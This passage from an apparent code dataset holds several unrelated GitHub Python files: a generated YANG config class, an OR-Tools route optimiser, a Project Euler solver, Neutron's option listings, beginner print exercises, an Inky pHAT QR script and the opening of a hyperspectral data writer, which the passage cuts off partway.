ReturnCodes.kGeneralError\n\n for logFunc in self._log('internal-read-done').debug3Func(): logFunc('done. PARAMS, readAllOrFail=%s', readAllOrFail)\n return ReturnCodes.kOk\n\n def _collectItemsToDelete (self,\n configU, \n \n itemsToDelete):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('collect-items-to-delete').debug3Func(): logFunc('called: itemsToDelete=%s. PARAMS', itemsToDelete)\n\n \n\n for logFunc in self._log('collect-items-to-delete-done').debug3Func(): logFunc('done: itemsToDelete=%s. PARAMS', itemsToDelete)\n return ReturnCodes.kOk\n\n def _fillWriteTagValues (self, tagValueList):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('fill-write-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)\n\n \n if self.hasValueConfigU1():\n valValueConfigU1 = Value()\n if self.valueConfigU1 is not None:\n valValueConfigU1.setString(self.valueConfigU1)\n else:\n valValueConfigU1.setEmpty()\n tagValueList.push((\"value-config-u1\", \"http://qwilt.com/model/oper\"), valValueConfigU1)\n \n\n \n\n return ReturnCodes.kOk\n\n def _fillReadTagValues (self, tagValueList):\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('fill-read-tag-values').debug3Func(): logFunc('called: tagValueList=%s', tagValueList)\n\n \n if self.isValueConfigU1Requested():\n valValueConfigU1 = Value()\n valValueConfigU1.setEmpty()\n tagValueList.push((\"value-config-u1\", \"http://qwilt.com/model/oper\"), valValueConfigU1)\n \n\n \n\n return ReturnCodes.kOk\n\n def _readTagValues (self, tagValueList, readAllOrFail):\n __pychecker__ = 'maxlines=300'\n __pychecker__ = 'maxreturns=30'\n\n self.myInitGuard.isInitOrCrash()\n for logFunc in self._log('read-tag-values').debug3Func(): logFunc('called. readAllOrFail=%s, tagValueList=%s', readAllOrFail, tagValueList)\n\n res = ReturnCodes.kOk\n\n for logFunc in self._log('read-tag-values-leaves').debug3Func(): logFunc('reading leaves. tagValueList=%s', tagValueList)\n \n if self.isValueConfigU1Requested():\n ((tag, ns), tempValue) = tagValueList.popFront()\n if (tag != \"value-config-u1\") or \\\n (ns != \"http://qwilt.com/model/oper\"):\n for logFunc in self._log('reag-tag-values-unexpected-tag-leaf-valueconfigu1').errorFunc(): logFunc('got unexpected tag-value for leaf: %s. expected: (%s, %s), got: (%s, %s)',\n \"valueConfigU1\", \"value-config-u1\", \"http://qwilt.com/model/oper\", tag, ns)\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n\n tempVar = None\n tempVar = tempValue.asString()\n if res != ReturnCodes.kOk or tempVar is None:\n for logFunc in self._log('read-tag-values-value-config-u1-bad-value').infoFunc(): logFunc('valueConfigU1 not read')\n if readAllOrFail:\n self._clearAllReadData()\n return ReturnCodes.kGeneralError\n if tempVar is not None:\n self.setValueConfigU1(tempVar)\n for logFunc in self._log('read-tag-values-value-config-u1').debug3Func(): logFunc('read valueConfigU1. valueConfigU1=%s, tempValue=%s', self.valueConfigU1, tempValue.getType())\n \n\n \n\n for logFunc in self._log('read-tag-values-done').debug3Func(): logFunc('done. readAllOrFail=%s, tagValueList=%s', readAllOrFail, tagValueList)\n return ReturnCodes.kOk\n\n\n\n\"\"\"\nExtracted from the below data: \n{\n \"node\": {\n \"name\": \"configU\", \n \"namespace\": \"config_u\", \n \"className\": \"ConfigUMaapi\", \n \"importStatement\": \"from a.sys.blinky.example.oper.oper.config_a.config_u.config_u_maapi_gen import ConfigUMaapi\", \n \"baseClassName\": \"ConfigUMaapiBase\", \n \"baseModule\": \"config_u_maapi_base_gen\"\n }, \n \"ancestors\": [\n {\n \"moduleYangNamespacePrefix\": \"oper\", \n \"yangName\": \"config-a\", \n \"namespace\": \"config_a\", \n \"isCurrent\": false, \n \"isList\": false, \n \"moduleYangNamespace\": \"http://qwilt.com/model/oper\", \n \"name\": \"config-a\"\n }, \n {\n \"moduleYangNamespacePrefix\": \"oper\", \n \"isCurrent\": true, \n \"yangName\": \"config-u\", \n \"namespace\": \"config_u\", \n \"isList\": true, \n \"moduleYangNamespace\": \"http://qwilt.com/model/oper\", \n \"keyLeaf\": {\n \"varName\": \"configU\", \n \"defaultVal\": null, \n \"typeHandler\": \"handler: StringHandler\"\n }, \n \"name\": \"config-u\"\n }\n ], \n \"descendants\": [], \n \"conditionalDebugName\": null, \n \"operLeaves\": [], \n \"module\": {}, \n \"configLeaves\": [\n {\n \"moduleYangNamespace\": \"http://qwilt.com/model/oper\", \n \"moduleYangNamespacePrefix\": \"oper\", \n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"valueConfigU1\", \n \"yangName\": \"value-config-u1\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": null, \n \"hasDefaultRef\": false\n }\n ], \n \"env\": {\n \"namespaces\": [\n \"a\", \n \"sys\", \n \"blinky\", \n \"example\", \n \"oper\", \n \"oper\"\n ]\n }, \n \"leaves\": [\n {\n \"moduleYangNamespace\": \"http://qwilt.com/model/oper\", \n \"moduleYangNamespacePrefix\": \"oper\", \n \"typeHandler\": \"handler: StringHandler\", \n \"memberName\": \"valueConfigU1\", \n \"yangName\": \"value-config-u1\", \n \"object\": \"\", \n \"leafrefPath\": null, \n \"defaultVal\": null, \n \"hasDefaultRef\": false\n }\n ], \n \"createTime\": \"2013\"\n}\n\"\"\"\n\n\n","repo_name":"afeset/miner2-tools","sub_path":"oscar/a/sys/blinky/example/oper/oper/config_a/config_u/config_u_maapi_gen.py","file_name":"config_u_maapi_gen.py","file_ext":"py","file_size_in_byte":14974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20232167094","text":"from __future__ import print_function\nfrom ortools.constraint_solver import routing_enums_pb2\nfrom ortools.constraint_solver import pywrapcp\nfrom typing import List, Optional, Tuple\nimport osmnx as ox\nimport networkx as nx\nimport folium\nfrom folium import plugins\nimport numpy as np\n\n\ndef print_solution(manager, routing, solution, names=None):\n \"\"\"\n Prints the solution on the console.\n\n Args:\n manager: The routing index manager.\n routing: The routing model.\n solution: The solution obtained from the routing solver.\n names (Optional[List[str]]): List of names corresponding to node indices. Defaults to None.\n \"\"\"\n index = routing.Start(0)\n plan_output = \"Route for vehicle:\\n\"\n route_distance = 0\n while not routing.IsEnd(index):\n idx = manager.IndexToNode(index)\n if names:\n print_value = names[idx]\n else:\n print_value = idx\n plan_output += \" {} ->\".format(print_value)\n previous_index = index\n index = solution.Value(routing.NextVar(index))\n route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)\n\n idx = manager.IndexToNode(index)\n if names:\n print_value = names[idx]\n else:\n print_value = idx\n plan_output += \" {}\\n\".format(print_value)\n plan_output += \"Route distance: {:.1f}km\\n\".format(route_distance / 1000)\n print(plan_output)\n\n\ndef optimize_routes(\n distance_matrix: List[List[int]], depot: int, names: Optional[List[str]] = None\n) -> List[int]:\n \"\"\"\n Solves the vehicle routing problem and returns the optimized route.\n\n Args:\n distance_matrix (List[List[int]]): 2D list representing the distance matrix between nodes.\n depot (int): Index of the depot (starting point).\n names (Optional[List[str]]): List of names corresponding to node indices. Defaults to None.\n\n Returns:\n List[int]: The optimized route as a list of node indices.\n \"\"\"\n # Create the routing index manager.\n manager = pywrapcp.RoutingIndexManager(\n len(distance_matrix), 1, depot\n ) # num of vehicles set to 1\n\n # Create Routing Model.\n routing = pywrapcp.RoutingModel(manager)\n\n def distance_callback(from_index, to_index):\n \"\"\"Returns the distance between the two nodes.\"\"\"\n # Convert from routing variable Index to distance matrix NodeIndex.\n from_node = manager.IndexToNode(from_index)\n to_node = manager.IndexToNode(to_index)\n return distance_matrix[from_node][to_node]\n\n transit_callback_index = routing.RegisterTransitCallback(distance_callback)\n\n # Define cost of each arc.\n routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)\n\n # Setting first solution heuristic.\n search_parameters = pywrapcp.DefaultRoutingSearchParameters()\n search_parameters.first_solution_strategy = (\n routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC\n )\n\n # Solve the problem.\n solution = routing.SolveWithParameters(search_parameters)\n\n # Print solution on console and return the optimized route.\n if solution:\n print_solution(manager, routing, solution, names)\n route = []\n index = routing.Start(0)\n while not routing.IsEnd(index):\n route.append(manager.IndexToNode(index))\n index = solution.Value(routing.NextVar(index))\n route.append(manager.IndexToNode(index))\n return route\n else:\n return []\n\n\ndef plot_route(\n coordinates: List[Tuple[float, float]], dist: float = 1000, zoom_start: int = 15\n) -> folium.Map:\n \"\"\"\n Plot the route on a Folium map.\n\n Args:\n coordinates (List[Tuple[float, float]]): List of tuples containing (latitude, longitude) pairs.\n dist (float, optional): Distance for graph retrieval. Defaults to 1000.\n zoom_start (int, optional): Initial map zoom level. Defaults to 15.\n\n Returns:\n folium.Map: Folium map with the plotted route.\n \"\"\"\n\n # Calculate the median tuple\n median_tuple = tuple(np.median(np.array(coordinates), axis=0))\n\n # Calculate the Euclidean distance of each tuple from the median tuple\n distances = [\n np.linalg.norm(np.array(t) - np.array(median_tuple)) for t in coordinates\n ]\n\n # Find the index of the tuple with the minimum distance\n closest_index = np.argmin(distances)\n\n # Get the tuples with the closest and farthest values to the median tuple\n closest_tuple = coordinates[closest_index]\n\n # Create a graph using OpenStreetMap data\n graph = ox.graph_from_point(\n center_point=closest_tuple, dist=dist, network_type=\"drive\"\n )\n\n # Create a folium map centered at the start coordinate\n map_center = closest_tuple\n mymap = folium.Map(\n location=map_center, zoom_start=zoom_start, tiles=\"cartodbpositron\"\n )\n\n # Plot the route between each pair of consecutive coordinates\n num_stops = len(coordinates)\n for i in range(num_stops - 1):\n start_node = ox.distance.nearest_nodes(\n graph, coordinates[i][1], coordinates[i][0]\n )\n end_node = ox.distance.nearest_nodes(\n graph, coordinates[i + 1][1], coordinates[i + 1][0]\n )\n route = nx.shortest_path(graph, start_node, end_node, weight=\"length\")\n route_coordinates = [\n (graph.nodes[node][\"y\"], graph.nodes[node][\"x\"]) for node in route\n ]\n\n route_polyline = folium.PolyLine(locations=route_coordinates, color=\"red\")\n mymap.add_child(route_polyline)\n\n ant_path = plugins.AntPath(\n locations=route_coordinates,\n color=\"blue\",\n dash_array=[10, 50],\n delay=500,\n weight=5,\n )\n mymap.add_child(ant_path)\n\n # Add markers for the start and end points, and blue markers for the intermediate points\n folium.Marker(\n location=coordinates[-1], icon=folium.Icon(color=\"red\", icon=\"stop\")\n ).add_to(mymap)\n folium.Marker(\n location=coordinates[0], icon=folium.Icon(color=\"green\", icon=\"play\")\n ).add_to(mymap)\n for coordinate in coordinates[1:-1]:\n folium.Marker(\n location=coordinate, icon=folium.Icon(color=\"blue\", icon=\"store\")\n ).add_to(mymap)\n\n return mymap\n","repo_name":"albertferre/travelling-salesman-routing","sub_path":"src/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":6282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24483738910","text":"import useful as u\r\nimport math\r\n\r\nmaxVal = 10**9\r\nmaxPrimes = 10**8\r\n\r\nsmallPrimes = u.primesTo(25)\r\nlargePrimes = u.primesTo(maxPrimes)\r\nlargePrimesSet= set(largePrimes)\r\nprint(len(largePrimes))\r\n\r\ndef calcVal(x):\r\n answer = 1\r\n for i in range(len(x)):\r\n if x[i]==0:\r\n break\r\n answer *= smallPrimes[i]**x[i]\r\n return answer \r\n\r\ndef inc(x):\r\n temp = calcVal(x)\r\n new = x.copy()\r\n for i in range(len(x)):\r\n if temp*smallPrimes[i] < maxVal:\r\n new[i]+=1\r\n return new\r\n \r\n else:\r\n new[i]=1\r\n temp = calcVal(new)\r\n return []\r\n\r\nx=[0]*len(smallPrimes)\r\nvals = []\r\nwhile True:\r\n x = inc(x)\r\n if len(x)==0:\r\n break\r\n vals.append(calcVal(x))\r\n\r\nprint(len(vals))\r\n\r\nanswer = set()\r\n\r\nfor c,v in enumerate(vals):\r\n primeCan = v+3\r\n while not u.fastIsPrime2(primeCan,largePrimes,10**8,largePrimesSet):\r\n primeCan+=2\r\n answer.add(primeCan-v)\r\n\r\nprint(sum(answer))\r\n \r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 293.py","file_name":"problem 293.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8671964821","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport copy\nimport itertools\nimport operator\n\nfrom keystoneauth1 import loading as ks_loading\nfrom oslo_config import cfg\n\nimport neutron.agent.agent_extensions_manager\nimport neutron.agent.securitygroups_rpc\nimport neutron.conf.agent.agent_extensions_manager\nimport neutron.conf.agent.common\nimport neutron.conf.agent.database.agents_db\nimport neutron.conf.agent.database.agentschedulers_db\nimport neutron.conf.agent.dhcp\nimport neutron.conf.agent.l3.config\nimport neutron.conf.agent.l3.ha\nimport neutron.conf.agent.linux\nimport neutron.conf.agent.metadata.config as meta_conf\nimport neutron.conf.agent.ovs_conf\nimport neutron.conf.agent.ovsdb_api\nimport neutron.conf.common\nimport neutron.conf.db.dvr_mac_db\nimport neutron.conf.db.extraroute_db\nimport neutron.conf.db.l3_agentschedulers_db\nimport neutron.conf.db.l3_dvr_db\nimport neutron.conf.db.l3_extra_gws_db\nimport neutron.conf.db.l3_gwmode_db\nimport neutron.conf.db.l3_hamode_db\nimport neutron.conf.experimental\nimport neutron.conf.extensions.allowedaddresspairs\nimport neutron.conf.extensions.conntrack_helper\nimport neutron.conf.plugins.ml2.config\nimport neutron.conf.plugins.ml2.drivers.agent\nimport neutron.conf.plugins.ml2.drivers.driver_type\nimport neutron.conf.plugins.ml2.drivers.linuxbridge\nimport neutron.conf.plugins.ml2.drivers.macvtap\nimport neutron.conf.plugins.ml2.drivers.mech_sriov.agent_common\nimport neutron.conf.plugins.ml2.drivers.mech_sriov.mech_sriov_conf\nimport neutron.conf.plugins.ml2.drivers.openvswitch.mech_ovs_conf\nimport neutron.conf.plugins.ml2.drivers.ovs_conf\nimport neutron.conf.quota\nimport neutron.conf.service\nimport neutron.conf.services.extdns_designate_driver\nimport neutron.conf.services.logging\nimport neutron.conf.services.metering_agent\nimport neutron.conf.wsgi\nimport neutron.db.migration.cli\nimport neutron.extensions.l3\nimport neutron.extensions.securitygroup\nimport neutron.plugins.ml2.drivers.mech_sriov.agent.common.config\nimport neutron.wsgi\n\n\nAUTH_GROUPS_OPTS = {\n 'nova': {\n 'deprecations': {\n 'nova.cafile': [\n cfg.DeprecatedOpt('ca_certificates_file', group='nova')\n ],\n 'nova.insecure': [\n cfg.DeprecatedOpt('api_insecure', group='nova')\n ],\n 'nova.timeout': [\n cfg.DeprecatedOpt('url_timeout', group='nova')\n ]\n }\n },\n 'ironic': {},\n 'placement': {},\n 'designate': {}\n}\n\nCONF = cfg.CONF\n\n\ndef list_auth_opts(group):\n group_conf = AUTH_GROUPS_OPTS.get(group)\n kwargs = {'conf': CONF, 'group': group}\n deprecations = group_conf.get('deprecations')\n if deprecations:\n kwargs['deprecated_opts'] = deprecations\n opts = ks_loading.register_session_conf_options(\n **kwargs\n )\n opt_list = copy.deepcopy(opts)\n opt_list.insert(0, ks_loading.get_auth_common_conf_options()[0])\n # NOTE(mhickey): There are a lot of auth plugins, we just generate\n # the config options for a few common ones\n plugins = ['password', 'v2password', 'v3password']\n for name in plugins:\n for plugin_option in ks_loading.get_auth_plugin_conf_options(name):\n if all(option.name != plugin_option.name for option in opt_list):\n opt_list.append(plugin_option)\n opt_list.sort(key=operator.attrgetter('name'))\n return [(group, opt_list)]\n\n\ndef list_ironic_auth_opts():\n return list_auth_opts('ironic')\n\n\ndef list_nova_auth_opts():\n return list_auth_opts('nova')\n\n\ndef list_placement_auth_opts():\n return list_auth_opts('placement')\n\n\ndef list_designate_auth_opts():\n return list_auth_opts('designate')\n\n\ndef list_agent_opts():\n return [\n ('agent',\n itertools.chain(\n neutron.conf.agent.common.ROOT_HELPER_OPTS,\n neutron.conf.agent.common.AGENT_STATE_OPTS,\n neutron.conf.agent.common.IPTABLES_OPTS,\n neutron.conf.agent.common.PROCESS_MONITOR_OPTS,\n neutron.conf.agent.common.AVAILABILITY_ZONE_OPTS)\n ),\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.common.INTERFACE_DRIVER_OPTS,\n neutron.conf.agent.metadata.config.SHARED_OPTS)\n )\n ]\n\n\ndef list_extension_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.extensions.allowedaddresspairs\n .allowed_address_pair_opts,\n neutron.conf.extensions.conntrack_helper.conntrack_helper_opts)\n ),\n ('quotas',\n itertools.chain(\n neutron.conf.quota.l3_quota_opts,\n neutron.conf.quota.security_group_quota_opts)\n )\n ]\n\n\ndef list_db_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.database.agents_db.AGENT_OPTS,\n neutron.conf.db.extraroute_db.EXTRA_ROUTE_OPTS,\n neutron.conf.db.l3_gwmode_db.L3GWMODE_OPTS,\n neutron.conf.agent.database.agentschedulers_db\n .AGENTS_SCHEDULER_OPTS,\n neutron.conf.db.dvr_mac_db.DVR_MAC_ADDRESS_OPTS,\n neutron.conf.db.l3_dvr_db.ROUTER_DISTRIBUTED_OPTS,\n neutron.conf.db.l3_agentschedulers_db.L3_AGENTS_SCHEDULER_OPTS,\n neutron.conf.db.l3_hamode_db.L3_HA_OPTS,\n neutron.conf.db.l3_extra_gws_db.L3_EXTRA_GWS_OPTS)\n ),\n ('database',\n neutron.db.migration.cli.get_engine_config())\n ]\n\n\ndef list_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.common.core_cli_opts,\n neutron.conf.common.core_opts,\n neutron.conf.wsgi.socket_opts,\n neutron.conf.service.SERVICE_OPTS,\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n (neutron.conf.common.NOVA_CONF_SECTION,\n itertools.chain(\n neutron.conf.common.nova_opts)\n ),\n (neutron.conf.common.IRONIC_CONF_SECTION,\n itertools.chain(\n neutron.conf.common.ironic_opts)\n ),\n (neutron.conf.common.PLACEMENT_CONF_SECTION,\n itertools.chain(\n neutron.conf.common.placement_opts)\n ),\n ('designate',\n neutron.conf.services.extdns_designate_driver.designate_opts\n ),\n ('quotas', neutron.conf.quota.core_quota_opts)\n ]\n\n\ndef list_base_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.common.INTERFACE_OPTS,\n neutron.conf.agent.common.INTERFACE_DRIVER_OPTS,\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n ('agent', neutron.conf.agent.common.AGENT_STATE_OPTS),\n ('ovs',\n itertools.chain(\n neutron.conf.agent.ovsdb_api.API_OPTS,\n neutron.conf.agent.ovs_conf.OPTS)\n ),\n ]\n\n\ndef list_az_agent_opts():\n return [\n ('agent', neutron.conf.agent.common.AVAILABILITY_ZONE_OPTS),\n ]\n\n\ndef list_dhcp_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.dhcp.DHCP_AGENT_OPTS,\n neutron.conf.agent.dhcp.DHCP_OPTS,\n neutron.conf.agent.dhcp.DNSMASQ_OPTS)\n )\n ]\n\n\ndef list_linux_bridge_opts():\n return [\n ('DEFAULT',\n neutron.conf.service.RPC_EXTRA_OPTS),\n ('linux_bridge',\n neutron.conf.plugins.ml2.drivers.linuxbridge.bridge_opts),\n ('vxlan',\n neutron.conf.plugins.ml2.drivers.linuxbridge.vxlan_opts),\n ('agent',\n itertools.chain(\n neutron.conf.plugins.ml2.drivers.agent.agent_opts,\n neutron.conf.agent.agent_extensions_manager.\n AGENT_EXT_MANAGER_OPTS)\n ),\n ('securitygroup',\n neutron.conf.agent.securitygroups_rpc.security_group_opts),\n ('network_log',\n neutron.conf.services.logging.log_driver_opts)\n ]\n\n\ndef list_l3_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.agent.l3.config.OPTS,\n neutron.conf.service.SERVICE_OPTS,\n neutron.conf.agent.l3.ha.OPTS,\n neutron.conf.agent.common.PD_DRIVER_OPTS,\n neutron.conf.agent.common.RA_OPTS)\n ),\n ('agent',\n neutron.conf.agent.agent_extensions_manager.AGENT_EXT_MANAGER_OPTS),\n ('network_log',\n neutron.conf.services.logging.log_driver_opts)\n ]\n\n\ndef list_macvtap_opts():\n return [\n ('macvtap',\n neutron.conf.plugins.ml2.drivers.macvtap.macvtap_opts),\n ('agent',\n neutron.conf.plugins.ml2.drivers.agent.agent_opts),\n ('securitygroup',\n neutron.conf.agent.securitygroups_rpc.security_group_opts)\n ]\n\n\ndef list_metadata_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n meta_conf.SHARED_OPTS,\n meta_conf.METADATA_PROXY_HANDLER_OPTS,\n meta_conf.UNIX_DOMAIN_METADATA_PROXY_OPTS,\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n ('agent', neutron.conf.agent.common.AGENT_STATE_OPTS)\n ]\n\n\ndef list_metering_agent_opts():\n return [\n ('DEFAULT', neutron.conf.services.metering_agent.metering_agent_opts),\n ]\n\n\ndef list_ml2_conf_opts():\n return [\n ('ml2',\n neutron.conf.plugins.ml2.config.ml2_opts),\n ('ml2_type_flat',\n neutron.conf.plugins.ml2.drivers.driver_type.flat_opts),\n ('ml2_type_vlan',\n neutron.conf.plugins.ml2.drivers.driver_type.vlan_opts),\n ('ml2_type_gre',\n neutron.conf.plugins.ml2.drivers.driver_type.gre_opts),\n ('ml2_type_vxlan',\n neutron.conf.plugins.ml2.drivers.driver_type.vxlan_opts),\n ('ml2_type_geneve',\n neutron.conf.plugins.ml2.drivers.driver_type.geneve_opts),\n ('securitygroup',\n neutron.conf.agent.securitygroups_rpc.security_group_opts),\n ('ovs_driver',\n neutron.conf.plugins.ml2.drivers.openvswitch.mech_ovs_conf.\n ovs_driver_opts),\n ('sriov_driver',\n neutron.conf.plugins.ml2.drivers.mech_sriov.mech_sriov_conf.\n sriov_driver_opts)\n ]\n\n\ndef list_ovs_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n ('ovs',\n itertools.chain(\n neutron.conf.plugins.ml2.drivers.ovs_conf.ovs_opts,\n neutron.conf.agent.ovsdb_api.API_OPTS)\n ),\n ('agent',\n itertools.chain(\n neutron.conf.plugins.ml2.drivers.ovs_conf.agent_opts,\n neutron.conf.agent.agent_extensions_manager.\n AGENT_EXT_MANAGER_OPTS)\n ),\n ('securitygroup',\n neutron.conf.agent.securitygroups_rpc.security_group_opts),\n ('network_log',\n neutron.conf.services.logging.log_driver_opts),\n ('dhcp',\n itertools.chain(\n neutron.conf.plugins.ml2.drivers.ovs_conf.dhcp_opts,\n neutron.conf.agent.common.DHCP_PROTOCOL_OPTS)),\n ('metadata',\n itertools.chain(\n meta_conf.METADATA_PROXY_HANDLER_OPTS))\n ]\n\n\ndef list_sriov_agent_opts():\n return [\n ('DEFAULT',\n itertools.chain(\n neutron.conf.service.RPC_EXTRA_OPTS)\n ),\n ('sriov_nic',\n neutron.conf.plugins.ml2.drivers.mech_sriov.agent_common.\n sriov_nic_opts),\n ('agent',\n neutron.conf.agent.agent_extensions_manager.AGENT_EXT_MANAGER_OPTS)\n ]\n\n\ndef list_experimental_opts():\n return [\n (neutron.conf.experimental.EXPERIMENTAL_CFG_GROUP,\n itertools.chain(neutron.conf.experimental.experimental_opts)\n ),\n ]\n","repo_name":"openstack/neutron","sub_path":"neutron/opts.py","file_name":"opts.py","file_ext":"py","file_size_in_byte":12193,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"31295378429","text":"#Ejercicio 19:\n\"\"\"Necesitamos imprimir el nombre y número de asociado dentro de la siguiente frase:\n\nEstimado/a (nombre_asociado), su número de asociado es: (numero_asociado)\"\"\"\n\nnombre_asociado = \"Jesse Pinkman\"\nnumero_asociado = 399058\n\nprint(\"Estimado/a {}, su número de asociado es: {}\".format(nombre_asociado,numero_asociado ))\n\n\n#Ejercicio 20:\n# Muestra al usuario la cantidad de puntos acumulados dentro de la siguiente frase:\n\n# Has ganado (puntos_nuevos) puntos! En total, acumulas (puntos_totales) puntos\n\npuntos_nuevos = 350\npuntos_totales = 1225\n\nprint(f\"Has ganado {puntos_nuevos} puntos! En total, acumulas {puntos_totales} puntos\")\n\n#Ejercicio 21:\n# Muestra al usuario la cantidad de puntos acumulados dentro de la siguiente frase:\n\n# Has ganado (puntos_nuevos) puntos! En total, acumulas (puntos_totales) puntos\n\npuntos_anteriores = 875\npuntos_nuevos = 350\n\nprint(f\"Has ganado {puntos_nuevos} puntos! En total, acumulas {puntos_anteriores+puntos_nuevos} puntos\")","repo_name":"keiver31/Fundamentos_Python","sub_path":"Modulo_2/Ej_19_20_21.py","file_name":"Ej_19_20_21.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38583578528","text":"#!/usr/bin/env python\n\nimport sys\n\nimport qrcode\nimport inkyphat\n\nprint(\"\"\"Inky pHAT: QR Code\n\nDisplay a QR Code on Inky pHAT!\n\nUsage: {} \"\"\".format(sys.argv[0]))\n\n# Max length is 152\ntext = \"\"\"In the old #BILGETANK we'll keep you in the know,\nIn the old #BILGETANK we'll fix your techie woes.\n\nhttps://www.youtube.com/pimoroniltd\"\"\"\n\nif len(sys.argv) < 2:\n print(\"\"\"Valid colours for v2 are: red, yellow or black\nInky pHAT v1 is only available in red.\"\"\".format(sys.argv[0]))\n sys.exit(1)\n\ncolour = sys.argv[1]\n\ntry:\n inkyphat.set_colour(colour)\nexcept ValueError:\n print('Invalid colour \"{}\" for V{}\\n'.format(colour, inkyphat.get_version()))\n if inkyphat.get_version() == 2:\n sys.exit(1)\n print('Defaulting to \"red\"')\n\nif len(sys.argv) > 2:\n text = sys.argv[2]\n\n\nclass InkyQR(qrcode.image.base.BaseImage):\n def new_image(self, **kwargs):\n self.offset_x = kwargs.get(\"offset_x\", None)\n self.offset_y = kwargs.get(\"offset_y\", None)\n\n if self.pixel_size - (self.border * 2) > min(inkyphat.WIDTH, inkyphat.HEIGHT):\n print(\"QR code is too large for Inky pHAT, it probably wont scan! Try `box_size=1`\")\n\n if self.offset_x is None:\n self.offset_x = (inkyphat.WIDTH // 2) - (self.pixel_size // 2)\n if self.offset_y is None:\n self.offset_y = (inkyphat.HEIGHT // 2) - (self.pixel_size // 2)\n\n box = (self.offset_x, self.offset_y, self.offset_x + self.pixel_size - 1, self.offset_y + self.pixel_size - 1)\n inkyphat.rectangle(box, fill=inkyphat.WHITE)\n\n def pixel_box(self, row, col):\n x = (col + self.border) * self.box_size\n y = (row + self.border) * self.box_size\n x += self.offset_x\n y += self.offset_y\n return [(x, y), (x + self.box_size - 1, y + self.box_size - 1)]\n\n def drawrect(self, row, col):\n box = self.pixel_box(row, col)\n inkyphat.rectangle(box, fill=inkyphat.BLACK)\n\n\ninkyphat.set_image(\"resources/empty-backdrop.png\")\n\nqr = qrcode.QRCode(\n version=1,\n box_size=2,\n border=2,\n image_factory=InkyQR\n)\n\nqr.add_data(text)\nqr.make(fit=True)\nqr.make_image()\n\ninkyphat.show()\n","repo_name":"pimoroni/inky-phat","sub_path":"examples/qr.py","file_name":"qr.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"72"} +{"seq_id":"1645464238","text":"import os\nimport json\nfrom ._envi_writer import EnviWriter\nfrom ._happydata_writer import HappyDataWriter\nfrom happy.data import HappyData\n\n\nclass HappyWriter(HappyDataWriter):\n\n def name(self) -> str:\n return \"happy-writer\"\n\n def description(self) -> str:\n return \"Writes data in HAPPy format.\"\n\n def _write_data(self, happy_data_or_list, datatype_mapping=None):\n print(f\"write_data {datatype_mapping}\")\n if isinstance(happy_data_or_list, list):\n for happy_data in happy_data_or_list:\n self._write_single_data(happy_data,datatype_mapping)\n elif isinstance(happy_data_or_list, HappyData):\n self._write_single_data(happy_data_or_list, datatype_mapping)\n else:\n raise ValueError(\"Input should be either a HappyData object or a list of HappyData objects.\")\n\n def get_datatype_mapping_for(self, datatype_mapping, outputname):\n #outputname = outputname.strip(\"'\")\n #print(f\"checking: {outputname!r}\")\n #print(datatype_mapping)\n #for key in datatype_mapping:\n #print(f\"Key repr: {key!r}\")\n if datatype_mapping is None:\n #print(\"none\")\n return None\n if outputname not in datatype_mapping:\n #print(\"not in\")\n return None\n return datatype_mapping[outputname]\n \n def _write_single_data(self, happy_data, datatype_mapping=None):\n sample_id = happy_data.sample_id\n region_id = happy_data.region_id\n\n # Create a folder for the sample if it doesn't exist\n sample_dir = os.path.join(self.base_dir, sample_id)\n os.makedirs(sample_dir, exist_ok=True)\n\n # Create a folder for the region if it doesn't exist\n region_dir = os.path.join(sample_dir, region_id)\n os.makedirs(region_dir, exist_ok=True)\n\n \n # Write hyperspectral data\n hyperspec_file_path = os.path.join(region_dir, f\"{sample_id}.hdr\")\n envi_writer = EnviWriter(region_dir)\n envi_writer.write_data(happy_data.data, hyperspec_file_path, datatype=self.get_datatype_mapping_for(datatype_mapping, sample_id))\n print(f\"region happy data writer: {happy_data.data.shape}\")\n\n # Write hyperspectral metadata (global)\n 